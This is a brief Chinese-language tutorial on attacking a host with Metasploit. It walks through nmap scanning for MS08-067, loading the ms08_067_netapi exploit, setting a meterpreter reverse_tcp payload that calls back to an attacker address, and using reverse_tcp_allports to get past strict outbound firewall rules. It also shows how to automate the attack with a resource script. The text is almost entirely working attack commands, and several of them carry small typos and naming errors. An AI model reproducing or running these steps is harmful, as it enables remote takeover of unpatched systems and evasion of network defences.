以下利用metasploit攻擊網站的具體思路:
1、先判斷開放了哪些端口
nmap -sT -A --script=smb-vuln-ms08-067 -P0 192.167.2.2
2、根據開放的端口服務,尋找相應的漏洞攻擊模塊
search ms08-067_netapi
use exploit/windows/smb/ms08-067_netapi
show payload 尋找適合這個模塊的攻擊載荷
set payload windows/meterpreter/reverse_tcp
show options 查看需要設置哪些參數
set LHOST xxxx
set RHOST xxx
set LPORT xx
exploit 對目標嘗試攻擊。
反彈回 meterpreter shell
在上面的例子中,我們之所以能夠成功,主要是由於目標主機反彈連接使用的端口沒有被過濾掉。但是如果我們攻擊的組織內部設置了非常嚴格的出站端口怎么辦?我們可以猜測443端口沒有被防火牆禁止,同樣的可能還有FTP、telnet、ssh等服務使用的端口,可以逐一嘗試。。幸運的是,metasploit提供了一個專用的攻擊載荷幫助我們找到這些放行的端口。。
下面我們使用這個攻擊載荷,讓它嘗試對所有端口進行連接,直到找到成功連接的端口為止。。
use exploit/windows/smb/ms08-067_netapi
set LHOST xxxx
set RHOST xxx
set LPORT xx
search ports
set payload windows/meterpreter/reverse_tcp_allports
exploit -j 返回結果會顯示出與目標主機的哪個端口建立了連接。。
session -l -v 返回session 的 ID
session -i id號
最后反彈回 meterpreter
以下是一些其他相關信息:
資源文件:是msf終端內包含一系列自動化命令的腳本文件。。。
比如: echo use exploit/windows/smb/ms08_067_netapi > autoexploit.rc
echo set RHOST 1.2.3.2 >> autoexploit.rc
echo exploit >> autoexploit.rc (此處有省略)
進入msf終端 運行 resource autoexxploit.rc 回車
autoexploit.rc文件內的命令就會依次執行。。。。可以大大減少測試和開發的時間。。。